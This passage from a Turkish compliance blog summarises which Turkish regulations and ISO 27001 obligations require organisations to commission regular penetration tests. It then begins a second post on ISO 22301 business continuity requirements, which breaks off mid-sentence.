yayınlamıştır. Bu tebliğ 1 Temmuz 2020 tarihinde yürürlüğe girecektir ve
mevduat bankalarını, katılım bankalarını, kalkınma bankalarını ve yatırım
bankalarını kapsamaktadır. Kapsamdaki bankaların bilgi sistemleri aracılığıyla
sunduğu hizmetlerin tasarımı, geliştirilmesi, uygulanması veya yürütülmesinde
görevi bulunmayan bağımsız ekiplere yılda en az bir defa sızma testi
yaptırmaları gerekmektedir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Bilgi Alışverişi, Takas ve Mahsuplaşma
Kuruluşlarında Bilgi Sistemleri Yönetiminde Esas Alınacak İlkeler ile İş
Süreçleri ve Bilgi Sistemlerinin Denetimine İlişkin Tebliğ 4 Aralık 2013’te
yayınlanmıştır. Bu tebliğ; Banka Kartları ve Kredi Kartları Kanununun 4 üncü
maddesi çerçevesinde faaliyet izni alarak bilgi alışverişi faaliyetinde bulunan
kuruluşları, Banka Kartları ve Kredi Kartları Kanununun 4 üncü maddesi
çerçevesinde faaliyet izni alarak takas ve mahsuplaşma faaliyetinde bulunan
kuruluşları ve Risk Merkezini kapsar. Kapsamdaki kuruluşların yılda en az bir
defa sızma testi yaptırma gereklilikleri bulunmaktadır.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Finansal Kiralama, Faktoring ve Finansman
Şirketlerinin Bilgi Sistemlerinin Yönetimine ve Denetimine İlişkin Tebliğ 6
Nisan 2019’da yayınlanmıştır ve finansal kiralama, faktoring ve finansman şirketlerini
kapsamaktadır. Bu tebliğde bilgi güvenliği yönetimi başlığı altında kapsamdaki
şirketlerin 2 yılda bir sızma testi yaptırmaları gerektiği belirtilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Ödeme Kuruluşları ve Elektronik Para
Kuruluşlarının Bilgi Sistemlerinin Yönetimine ve Denetimine İlişkin Tebliğ 27
Haziran 2014 tarihinde yayınlanmış ve ödeme hizmeti sağlamak ve gerçekleştirmek
için Kanun kapsamında yetkilendirilmiş tüzel kişileri ve kanun kapsamında
elektronik para ihraç etme yetkisi verilen tüzel kişileri kapsamaktadır.
Kapsamdaki kuruluşlar, bilgi sistemleri aracılığıyla sunduğu hizmetlerin
tasarımı, geliştirilmesi, uygulanması veya yürütülmesinde görevi bulunmayan
bağımsız ekiplere yılda en az bir defa sızma testi yaptırmakla yükümlü
tutulmuşlardır.<o:p></o:p></div>
<h2>
Enerji Piyasası Düzenleme Kurumu<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->13 Temmuz 2017 tarihinde yayınlanan Enerji
Sektöründe Kullanılan Endüstriyel Kontrol Sistemlerinde Bilişim Güvenliği
Yönetmeliğinde geçtiği üzere EKS (Endüstriyel Kontrol Sistemleri) Güvenlik
Kontrolleri isimli bir rehber yayınlanmıştır. Bu rehberde geçtiği üzere organizasyonların
belirli sıklıkta ve özel olarak belirlenen bir kapsamda sızma testi
gerçekleştirmeleri, raporlamaları ve sonuçları analiz etmeleri gerektiği
belirtilmiştir. Bu rehberin kapsamındaki organizasyonlar EKS’nin sahibi olan
organizasyonlardır. <o:p></o:p></div>
<h2>
Kişisel Verileri Koruma Kurumu<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Ocak 2018’de yayınlanan Kişisel Veri Güvenliği
Rehberi (Teknik ve İdari Tedbirler), kişisel veri güvenliğinin takibi maddesi
altında bu hususa yer vermiştir. Bu maddede bilişim sistemlerinin bilinen
zafiyetlere karşı korunması için düzenli olarak zafiyet taramaları ve sızma
testlerinin yapılması ile ortaya çıkan güvenlik açıklarına dair testlerin
sonucuna göre değerlendirme yapılması gerektiği belirtilmiştir. Ayrıca rehberde
bulunan veri sorumluları tarafından alınabilecek teknik tedbirlerin
gösterildiği tabloda sızma testine yer verilmiştir. 6698 sayılı Kişisel
Verilerin Korunması Kanununa uymakla yükümlü olan kişisel verileri işleyen
gerçek ve tüzel kişilerin bu rehberdeki tedbirleri göz önünde bulundurmaları
gerekmektedir. <o:p></o:p></div>
<h2>
Sermaye Piyasası Kurulu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Kurul tarafından 5 Ocak 2018 tarihinde Bilgi
Sistemleri Yönetim Tebliği yayınlanmıştır. Bilgi sistemleri risk yönetimi
başlığı altında, sızma testi konusunda ulusal veya uluslararası belgeye sahip
gerçek veya tüzel kişiler tarafından en az yılda bir kez sızma testine tabi
tutuldukları belirtilmiştir. Aynı tebliğin Ek-1 Bilgi Sistemleri Sızma Testleri
Usul ve Esasları dokümanında teknik gereklilikler açıklanmıştır. Ek-1’e göre
sızma testleri kapsamında gerçekleştirilecek asgari testler aşağıda
verilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->İletişim Altyapısı ve Aktif Cihazlar<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->DNS Servisleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Etki Alanı ve Kullanıcı Bilgisayarları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->E-posta Servisleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Veri Tabanı Sistemleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Web Uygulamaları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Mobil Uygulamalar<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Kablosuz Ağ Sistemleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Dağıtık Servis Dışı Bırakma Testleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Sosyal Mühendislik Testleri<o:p></o:p></div>
<h2>
Gelir İdaresi Başkanlığı<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->19 Kasım 2019’da yayınlanan e-Belge Özel
Entegratörleri Bilgi Sistemleri Denetim Kılavuzu, GİB’den izin alan / alacak
olan Özel Entegratör kuruluşlarını kapsamaktadır. Kılavuzda tanımlanan
varlıkları ve bilgi sistemlerinin genelini kapsayacak şekilde yılda en az bir
kez olmak üzere sızma testi yaptırılması gerektiği belirtilmiştir. Kılavuzda
yer alan sızma testi kapsamı aşağıda verilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Ağ ve İletişim Altyapısı Testleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->İşletim Sistemi ve Platform Testleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Uygulama Testleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Veri Tabanı Testleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Web Uygulamaları Testleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Mobil Uygulama Testleri<o:p></o:p></div>
<h2>
Ulaştırma ve Altyapı Bakanlığı <o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Bakanlık tarafından 21 Haziran 2017 tarihinde KamuNet
Ağına Bağlanma ve KamuNet Ağının Denetimine İlişkin Usul ve Esaslar Hakkında
Tebliğ yayınlanmıştır. Bu tebliğde yer aldığı üzere KamuNet’e dâhil edilecek ve
dâhil olan kamu kurumlarının, KamuNet’in bağlı olduğu sistemler üzerinde
sızma/penetrasyon testleri gerçekleştirerek tespit edilen açıklıkların giderilmesi
için çalışmalar yapması gerekmektedir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 0cm; mso-add-space: auto;">
<br /></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 0cm; mso-add-space: auto;">
Yukarıda
bahsedilen düzenlemelere ek olarak ISO/IEC 27001 sertifikasına sahip olma
zorunluluğu bulunan kuruluşların standardın EK-A güvenlik kontrolleri bölümünde
<i style="mso-bidi-font-style: normal;">A.12.6.1 Teknik Açıklıkların Yönetimi </i>kapsamında
düzenli olarak sızma testi yaptırmaları veya bu kontrol gereğince kendi
kaynakları ile düzenli olarak teknik açıklıkları tespit etmesi gereklidir. Aşağıda
ISO/IEC 27001 belgesine sahip olma yükümlülükleri verilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Bilgi Teknolojileri ve İletişim Kurumunun
yayınladığı Elektronik İmza ile İlgili Süreçlere ve Teknik Kriterlere İlişkin
Tebliğ kapsamında bulunan elektronik sertifika hizmet sağlayıcıları,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Bilgi Teknolojileri ve İletişim Kurumunun
yayınladığı Kayıtlı Elektronik Posta Sistemi ile İlgili Süreçlere ve Teknik
Kriterlere İlişkin Tebliğ kapsamındaki kayıtlı elektronik posta hizmet
sağlayıcıları,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Bilgi Teknolojileri ve İletişim Kurumunun
yayınladığı Elektronik Haberleşme Güvenliği Kapsamında TS ISO/IEC 27001
Standardı Uygulamasına İlişkin Tebliğ kapsamındaki elektronik haberleşme
hizmeti sunan ve/veya elektronik haberleşme şebekesi sağlayan ve alt yapısını
işleten sermaye şirketleri. Uygunluk belgesi aranan işletmeciler aşağıdadır,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Görev Sözleşmesi İmzalayan İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->İmtiyaz Sözleşmesi İmzalayan İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Uydu Haberleşme Hizmeti Veren İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Altyapı İşletmeciliği Hizmeti Veren İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Sabit Telefon Hizmeti İşletmecileri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->GMPCS Mobil Telefon Hizmeti Veren İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Sanal Mobil Şebeke Hizmeti İşletmecileri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->İnternet Servis Sağlayıcıları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "Courier New"; mso-fareast-font-family: "Courier New";"><span style="mso-list: Ignore;">o<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Hava Taşıtlarında GSM 1800 Mobil Telefon Hizmeti
Veren İşletmeciler<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Enerji Piyasası Düzenleme Kurumunun (EPDK)
yayınladığı Doğal Gaz Piyasası Lisans Yönetmeliği kapsamında bulunan iletim
faaliyetini gerçekleştiren lisans sahibi tüzel kişilerin ve sevkiyat kontrol
merkezi kurmakla yükümlü dağıtım lisans sahiplerinin çalıştırdığı kurumsal
bilişim sistemi ile endüstriyel kontrol sistemleri,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->EPDK’nın yayınladığı Elektrik Piyasası Lisans
Yönetmeliği kapsamındaki OSB üretim lisansı sahipleri hariç olmak üzere, kurulu
gücü 100MW ve üzerinde olan ve geçici kabulü yapılmış bütün üretim tesisleri
için, kurumsal bilişim sistemi ile endüstriyel kontrol sistemleri,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->EPDK’nın yayınladığı Petrol Piyasası Lisans
Yönetmeliği kapsamındaki rafinerici lisans sahiplerinin kurumsal bilişim
sistemi ile endüstriyel kontrol sistemleri,<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Gümrük ve Ticaret Bakanlığının yayınladığı Gümrük
İşlemlerinin Kolaylaştırılması Yönetmeliği kapsamında bulunan yetkilendirilmiş
yükümlü sertifikasına (YYS) sahip olmak isteyen tüzel kişiler.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Özetleyecek olursak, sızma testlerinin düzenli olarak
yaptırılması kuruluşlar için hassas bilgilerinin korunması açısından oldukça
önemlidir. Düzenlemelerde görüldüğü üzere özellikle enerji ve finans
sektöründeki kuruluşlar için bu konuda daha tedbirli olunması gerektiği göze
çarpmaktadır. Yasal açıdan bir zorunluluğu olmasa bile kuruluşların sızma testi
yaptırmaları, zafiyetlerinin farkında olup uygun adımlar atarak sistemlerini
daha güvenli hale getirmeleri için büyük bir fırsattır. <o:p></o:p></div>
<br />Sinem Varolhttp://www.blogger.com/profile/16134353775231308294noreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-80693604391741862872020-05-06T09:34:00.000+03:002020-05-06T09:34:38.332+03:00DÜZENLEMELERDE İŞ SÜREKLİLİĞİ VE ISO 22301 SERTİFİKASI GEREKLİLİKLERİ<br />
<div class="MsoNormal" style="text-align: right;">
<b style="background-color: white; color: #222222; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13.2px;">Sinem Varol, Danışman</b></div>
<div class="MsoNormal" style="text-align: justify;">
ISO 22301 İş Sürekliliği Yönetim
Sistemi (İSYS) sertifikasına sahip olmak, bir kuruluşun kritik faaliyetlerini
iş etki analizi aracılığıyla belirlediğinin, iş sürekliliği stratejisi ve
planlarının olduğunun, test ve tatbikatlar gerçekleştirdiğinin ve düzenli
olarak kurdukları bu sistemi denetlediklerinin bir göstergesidir. Bu standardın
ilk versiyonu 2012, son versiyonu 2019 yılında yayınlanmıştır. Bu standartlar
Türkçeye çevrilip TS ISO 22301:2013 ve TS ISO 22301:2020 olarak yayınlanmıştır.<o:p></o:p></div>
<div class="MsoNormal">
ISO 22301 iş sürekliliği yönetim sistemi işletiyor olmanın kuruluşlara
birçok faydası bulunmaktadır. Kabul edilebilir kesinti sürelerinin
belirlenmesiyle kritik olan süreçler ortaya çıkarılır, riskler belirlenerek
aksiyon alınır ve bu sayede kesintilerin kuruluşa olan negatif etkileri
azaltılmaya çalışılır. Aynı zamanda testler ve tatbikatlar gerçekleştirilip
olası bir felaket durumunda önceden belirlenmiş olan planlara ne kadar uyulduğu
ölçülmüş olur.<o:p></o:p></div>
<div class="MsoNormal">
Kuruluşlar ISO 22301 iş sürekliliği yönetim sistemini kendi
istek ve ihtiyaçları doğrultusunda kurabilir. Ancak bazı sektörlerde iş
sürekliliğinin kritik olması sebebi ile düzenleyici kuruluşlar tarafından bu ISO
22301 sertifikasına sahip olmak zorunlu tutulmuştur. Örneğin e-belge özel
entegratörleri için detayları aşağıda sunulan düzenleme ile ISO 23301
zorunluluğu getirilmiştir.</div>
<h2>
Gelir İdaresi Başkanlığı<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo4; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->Gelir İdaresi Başkanlığı tarafından 19 Kasım
2019’da e-belge Özel Entegratörleri Bilgi Sistemleri Denetim Kılavuzu
yayınlanmıştır. Bu kılavuzda belirtildiği üzere GİB’den izin alan/alacak olan
Özel Entegratör kuruluşlarının ISO 22301 İş Sürekliliği Yönetim Sistemi
Belgesine sahip olmaları zorunlu tutulmuştur. Ek olarak ISO/IEC 20000:1 2011
Bilgi Teknolojileri Hizmet Yönetim Sistemi Belgesi ve ISO/IEC 27001:2013 Bilgi
Güvenliği Yönetim Sistemi Belgesine sahip olmaları gerekmektedir. Kılavuzda
risk yönetiminin ISO 27001 ve ISO 22301 standartlarına göre yapılması gerektiği
belirtilmiştir. Ayrıca bu kuruluşların yılda en az bir kez sızma testi
yaptırmaları gerekmektedir. <o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Bu yazının devamında tebliğlerde ve yönetmeliklerde
yayınlandığı üzere doğrudan ISO 22301 sertifikasına sahip olma zorunluluğu
bulunmayan fakat iş sürekliliği yönetim sistemi kurmak, iş sürekliliği planı
hazırlamak, kabul edilebilir kesinti sürelerini belirlemekle yükümlü olan
kuruluşlara yönelik düzenlemelere yer verilmiştir. Belirtilen gereklilikler ISO
22301 standardı baz alınarak bir iş sürekliliği yönetim sistemi kurulduğunda
karşılanmış olacaktır.</div>
<h2>
Bankacılık Düzenleme ve Denetleme Kurumu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->14 Eylül 2007 tarihinde yayınlanan Bankalarda
Bilgi Sistemleri Yönetiminde Esas Alınacak İlkelere İlişkin Tebliğde yer aldığı
üzere iş etki analizi, risk değerlendirmesi, risk azaltma ve risk izleme
faaliyetleri doğrultusunda bilgi sistemlerine ilişkin iş süreklilik ve kurtarma
planı hazırlanması gerekmektedir. Bu gereklilikler ISO 22301 standardına uyum
sağlandığında karşılanmaktadır. Ek olarak tebliğde yer aldığı üzere bağımsız
ekiplere en az yılda bir kez sızma testi yaptırılması gerekmektedir. Bu
tebliğin kapsamı mevduat, katılım, kalkınma ve yatırım bankalarıdır. Bu tebliğ
1 Temmuz 2020 tarihinde yürürlükten kalkacaktır. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l3 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]-->15 Mart 2020 tarihinde yayınlanan Bankaların
Bilgi Sistemleri ve Elektronik Bankacılık Hizmetleri Hakkında Yönetmelikte “bilgi
sistemlerinin sürekliliğinin sağlanması” başlığında gerekli hususlar
açıklanmıştır. Yönetmeliğin kapsamı mevduat, katılım, kalkınma ve yatırım
bankalarıdır ve 1 Temmuz 2020 tarihinde yürürlüğe girecektir. İş etki analizi,
risk değerlendirmesi, risk yönetimi, izleme ve test faaliyetlerini içeren bir
bilgi sistemleri süreklilik yönetim sürecinin oluşturulması, ikincil merkezin
tesis edilmesi ve yılda en az bir defa gerçek bir felaket senaryosu sağlayıp
